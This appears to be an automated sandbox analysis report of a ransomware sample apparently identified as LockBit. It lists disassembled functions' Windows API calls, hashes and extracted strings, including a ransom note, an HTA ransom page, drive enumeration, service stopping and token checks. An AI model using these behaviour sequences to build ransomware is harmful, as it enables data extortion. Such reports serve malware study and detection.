                                                                                                              • Part of subcall function 0040FAE0: GetDriveTypeW.KERNEL32(?), ref: 0040FB21
                                                                                                              • Part of subcall function 0040FAE0: malloc.MSVCRT ref: 0040FB3C
                                                                                                              • Part of subcall function 0040FAE0: WNetGetConnectionW.MPR(?,00000004,00000200), ref: 0040FB53
                                                                                                              • Part of subcall function 0040FAE0: PathRemoveBackslashW.SHLWAPI(00000004), ref: 0040FB5E
                                                                                                              • Part of subcall function 0040FAE0: OpenThreadToken.ADVAPI32(000000FE,0000000A,00000001,?), ref: 0040FB6E
                                                                                                              • Part of subcall function 0040FAE0: CreateThread.KERNEL32(00000000,00000000,Function_0000FD80,00000000,00000000,?), ref: 0040FBA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Token$BackslashConnectionCreateDriveDrivesExitLogicalOpenPathRemoveShellTypeWindowmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3929415044-0
                                                                                                            • Opcode ID: 7d23054ed690ec3aac5ebc56d2d3c3c8e8f3f44ede322f2a8e7fe30d2cfb9d1f
                                                                                                            • Instruction ID: 4101877289c7421a6036770d9a9768c7a1a816a28cb37a051c33926b54369132
                                                                                                            • Opcode Fuzzy Hash: 7d23054ed690ec3aac5ebc56d2d3c3c8e8f3f44ede322f2a8e7fe30d2cfb9d1f
                                                                                                            • Instruction Fuzzy Hash: 59D05E303442405BD3612BB1DC0736A3730EF09347F408476E619644E3DFA454138E5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 004176F0: GetShellWindow.USER32 ref: 004176F6
                                                                                                            • SetThreadToken.KERNELBASE(00000000,00000000), ref: 0040FA89
                                                                                                            • ExitThread.KERNEL32 ref: 0040FA9D
                                                                                                              • Part of subcall function 0040FAE0: GetLogicalDrives.KERNEL32 ref: 0040FAE9
                                                                                                              • Part of subcall function 0040FAE0: GetDriveTypeW.KERNEL32(?), ref: 0040FB21
                                                                                                              • Part of subcall function 0040FAE0: malloc.MSVCRT ref: 0040FB3C
                                                                                                              • Part of subcall function 0040FAE0: WNetGetConnectionW.MPR(?,00000004,00000200), ref: 0040FB53
                                                                                                              • Part of subcall function 0040FAE0: PathRemoveBackslashW.SHLWAPI(00000004), ref: 0040FB5E
                                                                                                              • Part of subcall function 0040FAE0: OpenThreadToken.ADVAPI32(000000FE,0000000A,00000001,?), ref: 0040FB6E
                                                                                                              • Part of subcall function 0040FAE0: CreateThread.KERNEL32(00000000,00000000,Function_0000FD80,00000000,00000000,?), ref: 0040FBA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Token$BackslashConnectionCreateDriveDrivesExitLogicalOpenPathRemoveShellTypeWindowmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3929415044-0
                                                                                                            • Opcode ID: ce212603aac11781bc3675855e71463ee748920178874032cdb484617bee1945
                                                                                                            • Instruction ID: 47508319da1a960ce17c6bcd8d0e9cbdf43fb08619d36e7d49f9c84c3ae1c21e
                                                                                                            • Opcode Fuzzy Hash: ce212603aac11781bc3675855e71463ee748920178874032cdb484617bee1945
                                                                                                            • Instruction Fuzzy Hash: 67D0C9303441405AD6717BA1DC0776A3520EB08747F418036BA1A754E3DFA854068E9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetThreadToken.KERNELBASE(00000000), ref: 0040FD91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ThreadToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3254676861-0
                                                                                                            • Opcode ID: 8d69cfb7f56d8ad6617e8544cb50da8768f1d93b54990d49a06bd8383afc7a27
                                                                                                            • Instruction ID: 4c68e5a2d905e048453a918469b048e4365b540a42aeb1c2f26f6a1d8db9e43b
                                                                                                            • Opcode Fuzzy Hash: 8d69cfb7f56d8ad6617e8544cb50da8768f1d93b54990d49a06bd8383afc7a27
                                                                                                            • Instruction Fuzzy Hash: 74D0A930004308ABC6109AA8C808E963B9CEF08320F100A21F9A8E36C1D378A84046A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00417790: OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000), ref: 004177A3
                                                                                                              • Part of subcall function 00417790: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 004177C9
                                                                                                              • Part of subcall function 00417790: GetTokenInformation.KERNELBASE(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 004177E8
                                                                                                              • Part of subcall function 00417790: GetTokenInformation.KERNELBASE(?,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 00417800
                                                                                                              • Part of subcall function 00417790: CloseHandle.KERNEL32(00000002), ref: 00417808
                                                                                                            • ExitThread.KERNEL32 ref: 0040FACE
                                                                                                              • Part of subcall function 0040FAE0: GetLogicalDrives.KERNEL32 ref: 0040FAE9
                                                                                                              • Part of subcall function 0040FAE0: GetDriveTypeW.KERNEL32(?), ref: 0040FB21
                                                                                                              • Part of subcall function 0040FAE0: malloc.MSVCRT ref: 0040FB3C
                                                                                                              • Part of subcall function 0040FAE0: WNetGetConnectionW.MPR(?,00000004,00000200), ref: 0040FB53
                                                                                                              • Part of subcall function 0040FAE0: PathRemoveBackslashW.SHLWAPI(00000004), ref: 0040FB5E
                                                                                                              • Part of subcall function 0040FAE0: OpenThreadToken.ADVAPI32(000000FE,0000000A,00000001,?), ref: 0040FB6E
                                                                                                              • Part of subcall function 0040FAE0: CreateThread.KERNEL32(00000000,00000000,Function_0000FD80,00000000,00000000,?), ref: 0040FBA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$InformationThread$Open$BackslashCloseConnectionCreateDriveDrivesExitHandleLogicalPathProcessRemoveTypemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2613649929-0
                                                                                                            • Opcode ID: 1c2d5da3f418b48593706e4d5c7ffe3f93c3cac5a2d2d5258d53a6fb1f082d5c
                                                                                                            • Instruction ID: a0e87d9d42e7274586e0e2915d1a079f1a816a9d498025f61bd9d098843ec946
                                                                                                            • Opcode Fuzzy Hash: 1c2d5da3f418b48593706e4d5c7ffe3f93c3cac5a2d2d5258d53a6fb1f082d5c
                                                                                                            • Instruction Fuzzy Hash: 4DC04C307151415AD7723BA1DC0636A3174EB40347F89847BAA29614E3DF65A4168E9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GdiplusStartup.GDIPLUS ref: 00411E92
                                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00411EA8
                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00411EB2
                                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(00000000,00000000,00000000,0026200A,00000000,?), ref: 00411EDE
                                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,?), ref: 00411EFA
                                                                                                            • GdipCreateStringFormat.GDIPLUS(0000000A,0000000A,?), ref: 00411FD6
                                                                                                            • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 00411FE6
                                                                                                            • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 00411FFC
                                                                                                            • GdipFillRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?), ref: 00412054
                                                                                                            • malloc.MSVCRT ref: 00412072
                                                                                                            • wsprintfW.USER32 ref: 004120D0
                                                                                                            • free.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 0041212D
                                                                                                            • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412142
                                                                                                            • GdipDeleteBrush.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 0041214F
                                                                                                            • GdipDeleteStringFormat.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412155
                                                                                                            • GdipDeleteFont.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412162
                                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412169
                                                                                                            • GdipDisposeImage.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 00412173
                                                                                                              • Part of subcall function 00401160: GdipCreateLineBrushFromRect.GDIPLUS(?,?,?,?,00000000,00000000,0000000A,?,?,00412040,?,?,?,00000002), ref: 00401192
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 004121DF
                                                                                                            • GetTempFileNameW.KERNEL32(?,00000012,00000012,?,?,?,00000000,?,?,?,?,?,?,?,FFFFD700,00000000), ref: 004121F7
                                                                                                            • wsprintfW.USER32 ref: 0041223C
                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,0000000C,?,?,?,?,?,?,?,?,?,?,?), ref: 0041225A
                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00412329
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00412364
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00412392
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004123A0
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 004123B4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Gdip$Delete$FormatString$BrushCreateImageSystem$AlignFileFromGraphicsLineMetricsTempValuewsprintf$BitmapCloseContextDisposeFillFontGdiplusInfoNameOpenParametersPathRectRectangleSaveScan0Startupfreemalloc
                                                                                                            • String ID: 0$0$2$bPfk$bu$c$image/bmp$kwfw
                                                                                                            • API String ID: 1057032377-1992152674
                                                                                                            • Opcode ID: eb854612df39bcaa66371bfd8bb11581b24179fd73befcad49a4cf2ddf848974
                                                                                                            • Instruction ID: a62de033df0d0d70a3a5c523e934d968c5c1b1d89fe7917a69ea983d0474aa7d
                                                                                                            • Opcode Fuzzy Hash: eb854612df39bcaa66371bfd8bb11581b24179fd73befcad49a4cf2ddf848974
                                                                                                            • Instruction Fuzzy Hash: 62E15C715083859FD321DF60C944BEBBBE8EF89304F004A6EF68596261E7749588CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000008,?), ref: 004126B2
                                                                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 004126EC
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 00412700
                                                                                                            • NtQueryInformationToken.NTDLL ref: 0041271E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412781
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041278B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$CloseHandle$CheckCreateInformationKnownMembershipOpenProcessQueryWell
                                                                                                            • String ID: D
                                                                                                            • API String ID: 4244329739-2746444292
                                                                                                            • Opcode ID: b14ed53305c88dfec7069ed67e96c18ef42929af4c20dcac252d49074078405b
                                                                                                            • Instruction ID: d177bb60be750b8cf1effd2047966f98f576c4e33534fb29f20f52fbe2eb478d
                                                                                                            • Opcode Fuzzy Hash: b14ed53305c88dfec7069ed67e96c18ef42929af4c20dcac252d49074078405b
                                                                                                            • Instruction Fuzzy Hash: 12318171A00219ABDB20CF95CE08BEFB7BCEB04700F104167E911E72D0D7B89A54CBA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 0041A91A
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0041A930
                                                                                                            • RtlAcquirePebLock.NTDLL ref: 0041A9A0
                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 0041A9CF
                                                                                                            • RtlInitUnicodeString.NTDLL(?,00000000), ref: 0041A9D9
                                                                                                            • RtlReleasePebLock.NTDLL ref: 0041A9DB
                                                                                                            • LdrEnumerateLoadedModules.NTDLL(00000000,0041A6B0,00000000), ref: 0041A9EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitLockStringUnicode$AcquireAllocateDirectoryEnumerateLoadedMemoryModulesReleaseVirtualWindows
                                                                                                            • String ID: nA
                                                                                                            • API String ID: 5422265-513057715
                                                                                                            • Opcode ID: ee466e4a312c861c1ef558da750f235434c80703367bf4d8034a7777c82412f6
                                                                                                            • Instruction ID: 977a8b157154bdf697ba0ca944fec47ba57e436572ee9725ca2a7bb8ba4eeb95
                                                                                                            • Opcode Fuzzy Hash: ee466e4a312c861c1ef558da750f235434c80703367bf4d8034a7777c82412f6
                                                                                                            • Instruction Fuzzy Hash: 403155356012099BCB24ABA4CC05BEBB374FF44304F548169F915A7290EB345E54CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • wsprintfW.USER32 ref: 00416D17
                                                                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00416D2A
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00416DFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteFileMoveShellwsprintf
                                                                                                            • String ID: <$>$F$Removed autorun key$S
                                                                                                            • API String ID: 3421002583-812384200
                                                                                                            • Opcode ID: 5e71a743bc49030b7d2e673c69dcf19f7db90dad35eadb283a2afef5d8fe7582
                                                                                                            • Instruction ID: 4cee06e28628433ef3f28a2d162e63d1a5f098c3b67fbf08700f09a1b46886e2
                                                                                                            • Opcode Fuzzy Hash: 5e71a743bc49030b7d2e673c69dcf19f7db90dad35eadb283a2afef5d8fe7582
                                                                                                            • Instruction Fuzzy Hash: 61312F74A10249EBDB10DFE4C9047DEB7F5FF18304F40916AE404E72A0E7B89A45CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CommandLineToArgvW.SHELL32(?,?), ref: 0040FDD5
                                                                                                            • ExitProcess.KERNEL32 ref: 0040FDF9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ArgvCommandExitLineProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 615141403-0
                                                                                                            • Opcode ID: fbba6028643c4326079384133fa2381f9985d2fe42ada8b03b507fda9164e07d
                                                                                                            • Instruction ID: 32678c8bb9ba8561dcf39a414fc6963516d0944681ca6e103032348cfec98064
                                                                                                            • Opcode Fuzzy Hash: fbba6028643c4326079384133fa2381f9985d2fe42ada8b03b507fda9164e07d
                                                                                                            • Instruction Fuzzy Hash: FC219D31104301AFC720EF64D959A6A77A0FB44714F05093EF891A76F2EB34EC49CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CBD7
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CBF6
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CC15
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CC2F
                                                                                                            • free.MSVCRT(00000000,00000000,?,00408710,00000000,000007D8), ref: 0040CC49
                                                                                                              • Part of subcall function 0040BF10: free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0B1
                                                                                                              • Part of subcall function 0040BF10: free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: 6ef8bc312160c13116b3429ae9864e9d23f7317dc100eb2866e85cf07925db24
                                                                                                            • Instruction ID: 30ee0b842993cbac871ec0d33fe0992d288e7416a8e6868d06d9f47e057d32ee
                                                                                                            • Opcode Fuzzy Hash: 6ef8bc312160c13116b3429ae9864e9d23f7317dc100eb2866e85cf07925db24
                                                                                                            • Instruction Fuzzy Hash: 48D13DB2D00219DBDF20DF95D881BEFB7B8AF44314F14423AE815F7281E779AA458B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00411A9E
                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00411B7B
                                                                                                            • wsprintfW.USER32 ref: 00411BA3
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00411BC5
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00411BF3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411BFE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411C0C
                                                                                                              • Part of subcall function 00411CA0: GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,?), ref: 00411D03
                                                                                                              • Part of subcall function 00411CA0: OpenProcessToken.ADVAPI32(00000000), ref: 00411D0A
                                                                                                              • Part of subcall function 00411CA0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00411D2A
                                                                                                              • Part of subcall function 00411CA0: CloseHandle.KERNEL32(?), ref: 00411D3E
                                                                                                              • Part of subcall function 00411CA0: RegCreateKeyExA.ADVAPI32(-80000003,00000000,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00411D66
                                                                                                              • Part of subcall function 00411CA0: RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411DC9
                                                                                                              • Part of subcall function 00411CA0: lstrcmpiW.KERNEL32(?,?,?,?), ref: 00411DDB
                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00411C84
                                                                                                            Strings
                                                                                                            • <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i, xrefs: 00411ABB, 00411AC9, 00411B58
                                                                                                            • All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder, xrefs: 00411C36
                                                                                                            • S, xrefs: 00411C2B
                                                                                                            • =, xrefs: 00411C54
                                                                                                            • #, xrefs: 00411C3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateFileProcessToken$CurrentExecuteFolderInformationOpenPathQueryShellValueWritelstrcmpimallocwsprintf
                                                                                                            • String ID: #$<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i$=$All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder$S
                                                                                                            • API String ID: 3546182798-504096562
                                                                                                            • Opcode ID: b82b74984b81463f0da79cdc5e830c116db9911ea51f35308707ad8267a60602
                                                                                                            • Instruction ID: 27036e516c15185915eef6d2c999096d6a854e4cb5553d8195e816f98ecbc1ad
                                                                                                            • Opcode Fuzzy Hash: b82b74984b81463f0da79cdc5e830c116db9911ea51f35308707ad8267a60602
                                                                                                            • Instruction Fuzzy Hash: 83514E70D08345BEEF3197718C48BFBB7A89F04348F0081AEE556D71A1E778A984839D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00416814
                                                                                                            • EnumDependentServicesA.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 0041682E
                                                                                                            • malloc.MSVCRT ref: 00416851
                                                                                                            • EnumDependentServicesA.ADVAPI32(00000000,00000001,?,?,?,?), ref: 00416880
                                                                                                            • OpenServiceA.ADVAPI32(?,?,00000024), ref: 004168BE
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 004168D5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 004168F3
                                                                                                            • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 00416906
                                                                                                            • GetTickCount.KERNEL32 ref: 0041691A
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00416958
                                                                                                            • free.MSVCRT(?), ref: 0041697A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CountDependentEnumServicesTick$CloseControlHandleOpenQuerySleepStatusfreemalloc
                                                                                                            • String ID: epq
                                                                                                            • API String ID: 3593987911-3110135941
                                                                                                            • Opcode ID: 68a774514744c01db9345551f5312378c1067eac6b647b9080ce64807b1f35ae
                                                                                                            • Instruction ID: 5f6e222ca345191e9d17c7dcb4dea451a797b5f31df6702b08ae2cc9c99cff26
                                                                                                            • Opcode Fuzzy Hash: 68a774514744c01db9345551f5312378c1067eac6b647b9080ce64807b1f35ae
                                                                                                            • Instruction Fuzzy Hash: 36418171D0020DEBDF11DFA4DC49BEEBBB9FF08304F114166E904A6250D7799A85CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
